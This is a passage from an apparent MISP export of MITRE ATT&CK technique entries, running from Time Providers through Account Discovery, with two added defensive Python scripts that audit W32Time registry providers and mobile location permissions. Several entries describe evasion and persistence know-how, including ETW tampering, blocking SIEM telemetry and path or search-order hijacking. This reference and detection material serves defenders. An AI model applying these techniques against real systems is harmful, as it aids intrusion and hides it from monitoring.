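The registration described above lives in a handful of registry values, so a persistence hunt for this technique is an enumeration of the TimeProviders subkeys and a comparison against what Windows itself installs. The following is an added example, not code from ATT&CK or Microsoft: collect_time_providers() reads the key named in the passage with the standard library's winreg module (Windows only), and audit_time_providers() is pure logic exercised on a constructed snapshot. The list of DLLs Windows ships for its own providers (w32time.dll for NtpClient and NtpServer, vmictimeprovider.dll for the Hyper-V VMICTimeProvider) is the author's assumption, not something the page states.

```python
# Added example, not code from ATT&CK or Microsoft: enumerate and audit W32Time providers.
# EXPECTED_DLLS is the author's assumption about what Windows ships, not from the page.
import ntpath

TIME_PROVIDERS_KEY = r"System\CurrentControlSet\Services\W32Time\TimeProviders"
EXPECTED_DLLS = {
    "NtpClient": "w32time.dll",
    "NtpServer": "w32time.dll",
    "VMICTimeProvider": "vmictimeprovider.dll",
}


def collect_time_providers():
    """Return {provider: {value_name: data}} from HKLM; Windows only (needs winreg)."""
    import winreg
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, TIME_PROVIDERS_KEY) as key:
        n_sub = winreg.QueryInfoKey(key)[0]
        for i in range(n_sub):
            name = winreg.EnumKey(key, i)
            values = {}
            with winreg.OpenKey(key, name) as sub:
                n_val = winreg.QueryInfoKey(sub)[1]
                for j in range(n_val):
                    vname, data, _vtype = winreg.EnumValue(sub, j)
                    values[vname] = data
            result[name] = values
    return result


def audit_time_providers(providers):
    """Return findings for enabled providers that are unknown, swap the expected DLL, or
    load from outside System32. Disabled providers are never loaded and are skipped."""
    findings = []
    for name, values in providers.items():
        if not values.get("Enabled", 0):
            continue
        dll = str(values.get("DllName", ""))
        base = ntpath.basename(dll).lower()
        folder = ntpath.dirname(dll).lower()
        expected = EXPECTED_DLLS.get(name)
        if expected is None:
            findings.append("%s: unknown provider enabled, loads %s into W32Time as LocalService" % (name, dll))
        elif base != expected:
            findings.append("%s: expected %s but loads %s" % (name, expected, dll))
        if folder and not folder.endswith("\\system32"):
            findings.append("%s: DLL outside System32 (%s)" % (name, dll))
    return findings


if __name__ == "__main__":
    try:
        snapshot = collect_time_providers()
    except (ImportError, OSError):
        # Constructed snapshot for non-Windows hosts: three stock providers and one planted.
        snapshot = {
            "NtpClient": {"DllName": r"%systemroot%\system32\w32time.dll", "Enabled": 1},
            "NtpServer": {"DllName": r"%systemroot%\system32\w32time.dll", "Enabled": 0},
            "VMICTimeProvider": {"DllName": r"%systemroot%\system32\vmictimeprovider.dll", "Enabled": 1},
            "SyncProv": {"DllName": r"C:\ProgramData\sync\syncprov.dll", "Enabled": 1},
        }
    for finding in audit_time_providers(snapshot):
        print("-", finding)
```

Because the passage notes that registration needs administrator rights, a change to these subkeys (Sysmon event 13 on the key path, or a periodic diff of this snapshot) is a low-noise signal on its own.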

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1209"

Table 6209. Table References

Links

https://attack.mitre.org/techniques/T1209

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

https://github.com/scottlundgren/w32time

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

Scheduled Transfer - T1029

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029"

Table 6210. Table References

Links

https://attack.mitre.org/techniques/T1029

Shadow DNS - T1340

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).

The process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)

The tag is: misp-galaxy:mitre-attack-pattern="Shadow DNS - T1340"

Table 6211. Table References

Links

https://attack.mitre.org/techniques/T1340

https://blogs.cisco.com/security/talos/angler-domain-shadowing

Path Interception - T1034

This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).

Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)

There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Unquoted Paths

Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)

PATH Environment Variable Misconfiguration

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, <code>%SystemRoot%\system32</code> (e.g., <code>C:\Windows\system32</code>), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if <code>C:\example path</code> precedes <code>C:\Windows\system32</code> in the PATH environment variable, a program named net.exe placed in <code>C:\example path</code> will be called instead of the Windows system "net" when "net" is executed from the command-line.

Search Order Hijacking

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. If an adversary places a program called "net.exe" in the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception - T1034"

Table 6212. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://msdn.microsoft.com/en-us/library/ms687393

http://support.microsoft.com/KB/103000

http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120

https://attack.mitre.org/techniques/T1034

https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/

https://capec.mitre.org/data/definitions/159.html

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Location Tracking - T1430

Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.

On Android, applications holding the ACCESS_COARSE_LOCATION or ACCESS_FINE_LOCATION permissions provide access to the device’s physical location. On Android 10 and up, declaration of the ACCESS_BACKGROUND_LOCATION permission in an application’s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox)

On iOS, applications must include the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call requestWhenInUseAuthorization() to request access to location information when the application is in use or requestAlwaysAuthorization() to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the com.apple.locationd.preauthorized entitlement key.(Citation: Google Project Zero Insomnia)
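
Both the Broadcast Receivers technique above and this one are visible in an app's static declarations, so a first triage pass needs only the manifest and, on iOS, the Info.plist. The following is an added example, not code from ATT&CK, Google or Apple, serving both passages: triage_android_manifest() lists the location permissions an AndroidManifest.xml requests and every manifest-registered receiver with the intents it listens for, separating system (android.*) actions from other apps' actions, which the Broadcast Receivers passage singles out as the sign of targeting; triage_ios_info_plist() reports which NSLocation* usage keys an Info.plist carries. The manifest, plist, package and action names below are constructed samples.

```python
# Added example, not code from ATT&CK, Google or Apple: static triage of location
# permissions, manifest-registered broadcast receivers and iOS location-usage keys.
# SAMPLE_MANIFEST and SAMPLE_INFO_PLIST are constructed; all names in them are made up.
import plistlib
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
LOCATION_PERMS = {
    "android.permission.ACCESS_COARSE_LOCATION": "coarse",
    "android.permission.ACCESS_FINE_LOCATION": "fine",
    "android.permission.ACCESS_BACKGROUND_LOCATION": "background",
}
IOS_LOCATION_KEYS = (
    "NSLocationWhenInUseUsageDescription",
    "NSLocationAlwaysAndWhenInUseUsageDescription",
    "NSLocationAlwaysUsageDescription",
)


def triage_android_manifest(manifest_xml):
    """Return {'location': [...], 'receivers': [{name, exported, system_actions, third_party_actions}]}."""
    root = ET.fromstring(manifest_xml)
    perms = {LOCATION_PERMS[p.get(ANDROID_NS + "name")]
             for p in root.iter("uses-permission")
             if p.get(ANDROID_NS + "name") in LOCATION_PERMS}
    receivers = []
    for rcv in root.iter("receiver"):
        actions = [a.get(ANDROID_NS + "name")
                   for f in rcv.findall("intent-filter") for a in f.findall("action")]
        receivers.append({
            "name": rcv.get(ANDROID_NS + "name"),
            "exported": rcv.get(ANDROID_NS + "exported"),
            "system_actions": [a for a in actions if a.startswith("android.")],
            # Actions outside android.* are other apps' broadcasts: the targeting signal.
            "third_party_actions": [a for a in actions if not a.startswith("android.")],
        })
    return {"location": sorted(perms), "receivers": receivers}


def location_exposure(perms):
    """Summarise what the requested permissions let the app learn."""
    if not perms:
        return "none"
    level = "precise" if "fine" in perms else "approximate"
    return level + (" including in the background" if "background" in perms else " while in use")


def triage_ios_info_plist(plist_bytes):
    info = plistlib.loads(plist_bytes)
    return {"bundle": info.get("CFBundleIdentifier"),
            "location_keys": [k for k in IOS_LOCATION_KEYS if k in info]}


SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.spy">
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
  <application>
    <receiver android:name=".BootReceiver" android:exported="true">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name=".BankReceiver" android:exported="true">
      <intent-filter><action android:name="com.example.bank.TRANSACTION_DONE"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""
SAMPLE_INFO_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.tracker",
    "NSLocationAlwaysAndWhenInUseUsageDescription": "Needed to find nearby offers",
})

if __name__ == "__main__":
    report = triage_android_manifest(SAMPLE_MANIFEST)
    print("Android location:", location_exposure(report["location"]))
    for r in report["receivers"]:
        print(" receiver", r["name"], "system:", r["system_actions"], "third-party:", r["third_party_actions"])
    print("iOS:", triage_ios_info_plist(SAMPLE_INFO_PLIST))
```

A receiver listening for another package's action, combined with an ACCESS_BACKGROUND_LOCATION request, is the profile both passages describe; on Android 8 and later a manifest receiver for most implicit system broadcasts will simply never fire, so the third-party actions are the ones worth reading first.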

The tag is: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"

Table 6213. Table References

Links

https://attack.mitre.org/techniques/T1430

https://developer.android.com/training/location/permissions

https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services

https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Service Execution - T1035

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1035"

Table 6214. Table References

Links

https://attack.mitre.org/techniques/T1035

Anonymity services - T1306

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1306).

Anonymity services reduce the amount of information available that can be used to track an adversary’s activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)

The tag is: misp-galaxy:mitre-attack-pattern="Anonymity services - T1306"

Table 6215. Table References

Links

https://attack.mitre.org/techniques/T1306

Process Hollowing - T1093

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093"

Table 6216. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

https://attack.mitre.org/techniques/T1093

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Obfuscate infrastructure - T1309

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309"

Obfuscate infrastructure - T1309 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

Table 6217. Table References

Links

https://attack.mitre.org/techniques/T1309

Indicator Blocking - T1054

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering with settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved in multiple ways; most directly, by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054"

Table 6218. Table References

Links

https://attack.mitre.org/techniques/T1054

https://capec.mitre.org/data/definitions/571.html

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Code Injection - T1540

Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.

With root access, ptrace can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Code Injection - T1540"

Table 6219. Table References

Links

https://attack.mitre.org/techniques/T1540

https://fadeevab.com/shared-library-injection-on-android-8/

https://security.googleblog.com/2019/06/pha-family-highlights-triada.html

https://shunix.com/shared-library-injection-in-android/

PowerShell Profile - T1504

Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504"

Table 6220. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1504

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Software Packing - T1045

Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1045"

Table 6221. Table References

Links

http://en.wikipedia.org/wiki/Executable_compression

https://attack.mitre.org/techniques/T1045

https://capec.mitre.org/data/definitions/570.html

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

Biometric Spoofing - T1460

An adversary could attempt to spoof a mobile device’s biometric authentication mechanism, for example by providing a fake fingerprint as described by SRLabs in (Citation: SRLabs-Fingerprint).

iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Biometric Spoofing - T1460"

Biometric Spoofing - T1460 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 6222. Table References

Links

https://attack.mitre.org/techniques/T1460

Data Staged - T1074

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Data Staged - T1074"

Table 6223. Table References

Links

https://attack.mitre.org/techniques/T1074

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

Execution Guardrails - T1480

Adversaries may use execution guardrails to constrain execution or actions based on adversary-supplied and environment-specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480"

Table 6224. Table References

Links

https://attack.mitre.org/techniques/T1480

https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/

https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html

Process Injection - T1055

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: misp-galaxy:mitre-attack-pattern="Process Injection - T1055"

Table 6225. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.gnu.org/software/acct/

Acquire Access - T1650

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).

Note: while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Access - T1650"

Table 6226. Table References

Links

https://attack.mitre.org/techniques/T1650

https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

Input Capture - T1056

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1056"

Table 6227. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

https://attack.mitre.org/techniques/T1056

Process Discovery - T1057

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as show processes can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"

Table 6228. Table References

Links

https://attack.mitre.org/techniques/T1057

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760

https://www.us-cert.gov/ncas/alerts/TA18-106A

Stage Capabilities - T1608

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

The tag is: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608"

Table 6229. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/techniques/T1608

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://www.digicert.com/kb/ssl-certificate-installation.htm

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

Account Discovery - T1087

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

